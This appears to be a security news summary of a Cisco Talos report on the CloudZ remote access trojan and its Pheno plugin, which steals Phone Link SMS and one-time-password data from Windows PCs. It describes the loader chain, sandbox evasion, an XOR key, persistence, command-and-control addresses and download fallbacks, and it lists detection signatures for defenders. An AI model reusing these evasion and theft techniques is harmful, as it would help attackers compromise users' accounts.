CloudZ RAT used Pheno plugin to harvest Phone Link OTPs

Cisco Talos disclosed on May 5, 2026 that it observed an intrusion active since at least January 2026 in which the CloudZ remote access trojan (RAT) and a previously undocumented plugin named Pheno were used to collect Phone Link data and one-time passwords.

The operation began with an unknown initial access vector that led to execution of a fake ScreenConnect update installer. The installer was a Rust-compiled 64-bit loader disguised with names such as “systemupdates.exe” and “Windows-interactive-update.exe.” When executed, the loader decrypted and dropped a .NET loader to C:\ProgramData\Microsoft\windosDoc\ (files named like update.txt), then ran an embedded PowerShell script to create a scheduled task named SystemWindowsApis that launched the .NET loader via the legitimate regasm.exe binary.

The .NET loader performed multiple anti-analysis checks. It used timing checks to detect sandbox environments, scanned for security tools such as Wireshark, Fiddler, Procmon and Sysmon, and searched system paths and hostnames for virtual machine or sandbox indicators. The loader reassembled an embedded payload from hex chunks and decrypted it with a bytewise XOR using the key 0xCA. If the payload was a .NET assembly it executed it in memory; otherwise it wrote the payload to %TEMP% and ran it.

The payload was CloudZ, a modular .NET RAT compiled in mid-January 2026 and obfuscated with ConfuserEx. CloudZ decrypts its configuration in memory, downloads secondary configuration from attacker-controlled staging URLs (including several under hellohiall.workers[.]dev and Pastebin raw pages), and establishes TCP connections to a command-and-control server at 185.196.10.136 on port 8089. The RAT rotates user-agent strings and includes anti-caching HTTP headers. Its command dispatcher supports credential and browser-data theft, file download and write operations, screen recording, plugin management, and a GetWidgetLog command used for Phone Link reconnaissance.

Talos observed the RAT using its plugin subsystem to download and execute a plugin called Pheno. CloudZ attempts downloads first with curl, then with PowerShell Invoke-WebRequest, and finally with bitsadmin. In the incident Talos recorded a curl command retrieving pheno.exe from an attacker staging server.

Pheno scans running processes for Phone Link components such as YourPhone, PhoneExperienceHost and Link to Windows. When it finds matches it writes process IDs and paths to files named phonelink-<COMPUTERNAME>.txt in staging folders such as C:\ProgramData\Microsoft\feedback\cm and %TEMP%\Microsoft\feedback\cm. The plugin then searches those files for the keyword “proxy.” Phone Link creates a local proxy when relaying traffic between a paired mobile device and the PC; finding “proxy” causes Pheno to mark the session as “Maybe connected.” CloudZ reads the staging files and can copy Phone Link SQLite database files (for example PhoneExperiences-*.db) and send them to the operator, potentially exposing SMS messages, OTPs and notification content without infecting the mobile device.

Cisco Talos published indicators of compromise and detection signatures, including ClamAV detections Win.Packed.Msilheracles-10030690-0 and Win.Trojan.CloudZRAT-10059935-0 / 10059959-0, Snort SIDs 66408–66410 and Snort 3 SID 301492, and additional technical details on its GitHub repository.